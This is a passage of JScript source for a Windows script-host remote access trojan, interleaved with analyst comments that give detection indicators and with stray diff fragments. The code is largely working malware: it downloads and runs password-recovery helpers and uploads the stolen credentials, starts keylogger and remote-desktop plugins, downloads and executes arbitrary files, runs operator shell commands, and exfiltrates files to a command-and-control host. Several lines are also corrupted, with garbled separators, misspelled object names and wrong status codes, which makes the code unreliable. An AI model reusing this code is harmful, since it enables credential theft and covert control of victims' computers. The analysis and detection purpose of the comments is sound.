// save it with ADODB.Stream, run it up to ten times with a "/stext"-style
// argument that names "<short path>data" as output, then delete the helper and
// pass the output file to upload().
// The /stext switch and the [General] .cfg layout resemble NirSoft-style
// recovery utilities - confirm against the downloaded binary.
// There is no try/catch here; exceptions propagate to the polling loop's catch.
// Artefacts to look for: cmdc.exe, a matching .cfg and "cmdc.exedata" under
// %appdata% (or %temp%), and wscript.exe spawning taskkill /F /IM.
function passgrabber(fileurl, filename, retcmd)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("%comspec%(/c taskkill(/F(/IM " + filename,0, true);
|
|
|
|
try{filesystemobj.deleteFile(installdir + filename + "data");}
|
|
|
|
catch(ey){}
|
|
|
|
var config_file = installdir + filename.substr(0, filename.lastindexOf(".") +".cfg");
|
|
|
|
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTix=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C(00(00(00(00(00(00(00(01(00(00(00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF(00(00(00(00(00(00(00(00(80(02(00(00 E0(01(00(00\nColumns=FA(00(00(00 FA(00(01(00(6E(00(02(00(6E(00(03(00(78(00(04(00(78(00(05(00(78(00(06(00(64(00(07(00 FA(00(08(00\nSort=0";
|
2019-09-29 14:35:32 +00:00
|
|
|
var writer = filesystemobj.openTextFile(config_file, 2, true);
|
|
|
|
writer.writeLine(cfg);
|
|
|
|
writer.close();
|
|
|
|
writer = null;
|
|
|
|
var strlink = fileurl;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.open("get", strlink, false);
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.setRequestHeader("cache-control:", "max-age=8");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.send();
|
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objhttpdownload.status ==208)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamdownload.Type =1;
|
2019-09-29 14:35:32 +00:00
|
|
|
objstreamdownload.Open();
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
objstreamdownload.close();
|
|
|
|
objstreamdownload = null;
|
|
|
|
}
|
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var runner = WScript.CreateObject("Shell.Application");
|
|
|
|
var saver = objfsodownload.getFile(strsaveto).shortPath
|
|
|
|
for(var i=0; i<10; i++)
|
|
|
|
{
|
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
|
|
|
|
WScript.sleep(1008);
|
|
|
|
runner.shellExecute(saver, "(/stext " + saver + "data");
|
|
|
|
WScript.sleex(2800);
|
|
|
|
if(objfsodownload.fileExists(saver + "data")){break;}
|
|
|
|
}
|
|
|
|
deletefaf(strsaveto);
|
|
|
|
upload(saver + "data", retcmd);
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Analysis note - credential collection kept on disk ("get-pass-offline").
//   fileurl  - URL of the first helper (pass h == 0)
//   filename - name the helper is saved under in installdir
//   fileurl2 - URL of the second helper (pass h == 1)
// Runs the same fetch / write .cfg / execute-with-/stext sequence as
// passgrabber twice, but instead of uploading it copies the helper's text
// output into installdir + "wshlogs\":
//   pass 0 -> recovered_password_browser.log
//   pass 1 -> recovered_password_email.log
// The folder is created with "%comspec% /c mkdir" when missing. The stored
// logs are later listed and fetched through the "browse-logs" and "bring-log"
// commands of the dispatcher.
// Artefacts: a "wshlogs" directory under %appdata% or %temp% containing the
// two file names above; their presence means recovered credentials were
// staged on the host and should be treated as exposed.
function passgrabber2(fileurl, filename, fileurl2)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var h=0; h<2; h++)
|
|
|
|
{
|
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
|
|
|
|
try{filesystemobj.deleteFile(installdir + filename + "data");}
|
|
|
|
catch(ey){}
|
|
|
|
var config_file = installdir + filename.substr(8, filename.lastindexOf(".") + ".cfg");
|
|
|
|
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 08 08 08 08 08 08 08 01 08 08 08 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 08 08 08 08 08 08 08 08 88 02 08 08 E8 01 08 00\nColumns=FA 08 08 08 FA 08 01 08 6E 08 02 08 6E 08 03 08 78 08 04 08 78 08 05 08 78 08 06 08 64 08 07 08 FA 08 08 00\nSort=0";
|
|
|
|
var writer = filesystemobj.openTextFile(config_file, 2, true);
|
|
|
|
writer.writeLine(cfg);
|
|
|
|
writer.close();
|
|
|
|
writer = null;
|
|
|
|
var strlink = fileurl;
|
|
|
|
if(h ==1){strlink = fileurl2;}
|
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttx");
|
|
|
|
objhttpdownload.open("get", strlink, false);
|
|
|
|
objhttpdownload.setRequestHeader("cache-control:","max-age=0");
|
|
|
|
objhttpdownload.send();
|
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
if (objhttpdownload.status == 280)
|
|
|
|
{
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamdownload.Type = 1;
|
|
|
|
objstreamdownload.Open();
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
objstreamdownload.close();
|
|
|
|
objstreamdownload = null;
|
|
|
|
}
|
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
|
|
|
{
|
|
|
|
var runner = WScript.CreateObject("Shell.Application");
|
|
|
|
var saver = objfsodownload.getFile(strsaveto).shortPath;
|
|
|
|
for(var i=0; i<10; i++)
|
|
|
|
{
|
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 8, true);
|
|
|
|
WScript.sleep(1080);
|
|
|
|
runner.shellExecute(saver, " /stext " + saver + "data");
|
|
|
|
WScript.sleep(2008);
|
|
|
|
if(objfsodownload.fileExists(saver + "data"))
|
|
|
|
{
|
|
|
|
var objstreamuploade = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamuploade.Type =2;
|
|
|
|
objstreamuploade.Open();
|
|
|
|
objstreamuploade.loadFromFile(saver + "data");
|
|
|
|
var buffer = objstreamuploade.ReadText();
|
|
|
|
objstreamuploade.close();
|
|
|
|
var outpath = installdir + "wshlogs\\recovered_password_browser.log";
|
|
|
|
if(h == 1){outpath = installdir + "wshlogs\\recovered_password_email.log";}
|
|
|
|
var folder = objfsodownload.GetParentFolderName(outpath);
|
|
|
|
if (!objfsodownload.FolderExists(folder)){shellobj.run("%comspec% /c mkdir \"" + folder + "\"", 8, true);}
|
|
|
|
writer = filesystemobj.openTextFile(outpath, 2, true);
|
|
|
|
writer.write(buffer);
|
|
|
|
writer.close();
|
|
|
|
writer = null;
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
deletefaf(strsaveto);
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
// Analysis note - keylogger plugin loader ("keylogger" / "offline-keylogger").
//   fileurl    - URL the plugin is fetched from (supplied by the server)
//   filename   - name it is saved under in installdir (dispatcher passes
//                "kl-plugin.exe")
//   filearg    - host fingerprint string from information()
//   is_offline - 0 or 1, appended as the last command-line argument
// Kills a running instance of `filename`, fetches the plugin over HTTP, saves
// it with ADODB.Stream and starts it with the arguments
//   <host> <port> "<filearg>" <is_offline>
// so the plugin's command line itself exposes the C2 host and port.
// No error handling here; exceptions reach the polling loop's empty catch.
function keyloggerstarter (fileurl, filename, filearg, is_offline)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("%comspec%(/c taskkill(/F(/IM " + filename,0, true);
|
|
|
|
var strlink = fileurl;
|
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
|
|
|
|
objhttpdownload.open("get", strlink, false);
|
|
|
|
objhttpdownload.setRequestHeader("cache-control:", "max-age=8");
|
|
|
|
objhttpdownload.send();
|
2019-09-29 14:35:32 +00:00
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
if(objhttpdownload.status ==208)
|
|
|
|
{
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamdownload.Type =1;
|
|
|
|
objstreamdownload.Open();
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
objstreamdownload.close();
|
|
|
|
objstreamdownload = null;
|
|
|
|
}
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Analysis note - generic plugin loader ("filemanager" and "rdp" commands).
//   fileurl  - URL the plugin is fetched from (supplied by the server)
//   filename - name it is saved under in installdir (dispatcher passes
//              "fm-plugin.exe" or "rd-plugin.exe")
//   filearg  - host fingerprint string from information()
// Same sequence as keyloggerstarter without the offline flag: kill a running
// copy, fetch, save with ADODB.Stream, start with <host> <port> "<filearg>".
// Detection: wscript.exe as parent of a freshly written .exe in %appdata% or
// %temp% whose arguments are a host name and a port number.
function servicestarter(fileurl, filename, filearg)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
|
2019-09-29 14:35:32 +00:00
|
|
|
var strlink = fileurl;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir + filename;
|
2019-09-29 14:35:32 +00:00
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
|
|
|
|
objhttpdownload.open("get", strlink, false);
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.setRequestHeader("cache-control:","max-age=0");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.send();
|
2019-09-29 14:37:35 +00:00
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
if (objhttpdownload.status == 280)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamdownload.Type = 1;
|
|
|
|
objstreamdownload.Open();
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
objstreamdownload.close();
|
|
|
|
objstreamdownload = null;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto)){shellobj.run("\"" + strsaveto + "\" " + host + " " + port +" \"" + filearg +"\"");}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Analysis note - download-and-run from an arbitrary URL ("down-n-exec").
//   fileurl  - URL to fetch (supplied by the server)
//   filename - name the file is saved under in installdir
// Uses msxml2.serverxmlhttp (the other loaders in this file use
// msxml2.xmlhttp), writes the response body with ADODB.Stream when the status
// check passes, runs the saved file by its short path and reports
// "Executed+File" through updatestatus().
// Neither the URL nor the content is validated in any way; the file type is
// whatever the server chose.
function sitedownloader (fileurl,filename)
|
|
|
|
{
|
|
|
|
var strlink = fileurl;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.open("get", strlink, false);
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.setRequestHeader("cache-control", "max-age=0");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.send();
|
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
2019-09-29 14:35:32 +00:00
|
|
|
if (objhttpdownload.status == 200)
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamdownload.Type = 1;
|
|
|
|
objstreamdownload.Open();
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
objstreamdownload.close();
|
|
|
|
objstreamdownload = null;
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
|
|
|
|
updatestatus("Executed+File");
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Analysis note - file push from the operator's machine ("up-n-exec").
//   fileurl - path of the file as named by the server; it is appended to the
//             request path after "send-to-me" and the separator
//   filedir - destination folder; installdir is used when it is empty
// Unlike sitedownloader, the content comes from the C2 endpoint itself through
// a POST to http://host:port/send-to-me|<fileurl>. The body is written with
// ADODB.Stream, started by its short path, and "Executed+File" is reported.
// `strsaveto` is assigned without `var`, so it becomes a script-wide global.
// Network indicator: POST requests whose path begins with "send-to-me".
function download(fileurl,filedir)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if(filedir == "" ){filedir = installdir;}
|
|
|
|
strsaveto = filedir + fileurl.substr(fileurl.lastindexOf("\\" + 1));
|
2019-09-29 14:35:32 +00:00
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.open("post","http://" + host +":" + port +"/" +"send-to-me" + spliter + fileurl, false);
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.setRequestHeader("user-agent:", information());
|
|
|
|
objhttpdownload.send("");
|
2019-09-29 14:37:35 +00:00
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
if(objhttpdownload.status ==208)
|
|
|
|
{
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamdownload.Type =1;
|
|
|
|
objstreamdownload.Open();
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
objstreamdownload.close();
|
|
|
|
objstreamdownload = null;
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
|
|
|
|
updatestatus("Executed+File");
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Reports a status string to the C2 endpoint.
//   status_msg - text appended to the request path after "update-status" and
//                the separator (callers in this file pass values such as
//                "Updated", "Executed+File", "Client+Elevated")
// Sends a synchronous POST with an empty body; the reply is ignored and there
// is no error handling, so a failure propagates to the caller.
// Network indicator: POST paths beginning with "update-status".
function updatestatus(status_msg)
|
|
|
|
{
|
|
|
|
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:37:35 +00:00
|
|
|
objsoc.open("post","http://" + host +":" + port + "/" + "update-status" + spliter + status_msg, false);
|
2019-09-29 14:35:32 +00:00
|
|
|
objsoc.setRequestHeader("user-agent:", information());
|
|
|
|
objsoc.send("");
|
|
|
|
}
// Analysis note - file exfiltration helper.
//   fileurl - local path of the file to send (despite the parameter name)
//   retcmd  - C2 path the content is posted to (for example "take-log")
// Loads the file as binary through ADODB.Stream and sends the bytes as the
// body of a synchronous POST. Local `httpobj` shadows the global of the same
// name. No error handling; a missing file raises to the caller.
// Callers in this file use it for collected credential output and for files
// in the "wshlogs" folder.
function upload(fileurl, retcmd)
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var httpobj,objstreamuploade,buffer;
|
|
|
|
var objstreamuploade = WScript.CreateObject("adodb.stream");
|
|
|
|
objstreamuploade.Type =1;
|
|
|
|
objstreamuploade.Open();
|
|
|
|
objstreamuploade.loadFromFile(fileurl);
|
|
|
|
buffer = objstreamuploade.Read();
|
|
|
|
objstreamuploade.close();
|
|
|
|
objstreamdownload = null;
|
|
|
|
var httpobj = WScript.CreateObject("msxml2.xmlhttx");
|
|
|
|
httpobj.open("post","httx://" + host + ":" + port +"/" + retcmd, false);
|
|
|
|
httpobj.setRequestHeader("user-agent:", information());
|
|
|
|
httpobj.send(buffer);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Deletes a file or folder ("faf") at the given path.
//   url - local path (despite the parameter name)
// Calls deleteFile and then deleteFolder inside one try; whichever does not
// apply throws and the empty catch hides it. Used by the credential routines
// to remove the downloaded helper after use, which limits what is left for
// disk forensics - check file-system journals or EDR telemetry instead.
function deletefaf(url)
|
|
|
|
{
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
filesystemobj.deleteFile(url);
|
|
|
|
filesystemobj.deleteFolder(url);
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(err){}
|
|
|
|
}
// Analysis note - remote command execution ("cmd-shell" command).
//   cmd - command text received from the server, concatenated unmodified into
//         a %comspec% command line
// Output is redirected to installdir + "out.txt", read back in full, the file
// is deleted (errors ignored) and the text is returned to the caller, which
// posts it to the C2 endpoint.
// Detection: wscript.exe spawning cmd.exe with output redirected to out.txt
// under %appdata% or %temp%; command-line logging (process creation events)
// captures the operator's commands verbatim.
function cmdshell(cmd)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
|
|
|
var httpobj,oexec,readallfromany;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir +"out.txt";
|
|
|
|
shellobj.run("%comspec%(/c " + cmd + "(> \"" + strsaveto + "\"", 8, true);
|
|
|
|
readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
|
2019-09-29 14:35:32 +00:00
|
|
|
try{filesystemobj.deleteFile(strsaveto);}
|
|
|
|
catch(ee){}
|
|
|
|
return readallfromany;
|
|
|
|
}
// Analysis note - process listing ("get-processes" command).
// Queries Win32_Process through WMI and accumulates, per process, the name,
// process id and executable path into the string `ep`, using "^" between
// fields and `spliter` after each record. The intermediate value is held in
// `ex`, which is not declared with `var` and is therefore global.
// Returns `ep`; on a WMI error the empty catch leaves whatever was collected.
function enumprocess()
|
|
|
|
{
|
|
|
|
var ep = "";
|
|
|
|
try
|
|
|
|
{
|
|
|
|
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
|
|
|
|
var colitems = objwmiservice.ExecQuery("select * from win32_process",null,48);
|
|
|
|
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var objitem = fi.item();
|
|
|
|
ex = ep + objitem.name + "^";
|
|
|
|
ep = ex + objitem.processId + "^";
|
|
|
|
ep = ex + objitem.executablePath + spliter;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
catch(er){}
|
|
|
|
return ep;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Terminates a process tree ("kill-process" command).
//   pid - process id received from the server, concatenated into the
//         taskkill command line without validation
// Runs "taskkill /F /T /PID <pid>" hidden and waits for it; errors are ignored.
// Analysis note: can be used against security tooling, so taskkill launched by
// a script host against protected agents is worth alerting on.
function exitprocess(pid)
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try{shellobj.run("taskkill /F /T /PID " + pid,0,true);}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(err){}
|
|
|
|
}
// Returns the parent folder name of an existing file.
//   path - path of a file; getFile() throws when it does not exist
// Not called anywhere in the part of the script shown on this page.
function getParentDirectory(path)
|
|
|
|
{
|
|
|
|
var fo = filesystemobj.getFile(path);
|
|
|
|
return filesystemobj.getParentFolderName(fo);
|
|
|
|
}
// Analysis note - directory listing ("browse-logs" command).
//   enumdir - folder to list (the dispatcher passes installdir + "wshlogs")
// Returns one record per entry, each terminated by `spliter`:
//   folders: <name>^^d^<attributes>
//   files:   <name>^<size>^<attributes>
// Errors (for example a missing folder) are swallowed and the partial or
// empty string is returned.
function enumfaf(enumdir)
|
|
|
|
{
|
|
|
|
var re = "";
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var folder = fi.item();
|
|
|
|
re = re + folder.name + "^^d^" + folder.attributes + spliter;
|
|
|
|
}
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var file = fi.item();
|
|
|
|
re = re + file.name +"^" + file.size +"^" + file.attributes + spliter;
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
catch(err){}
|
|
|
|
return re;
|
|
|
|
}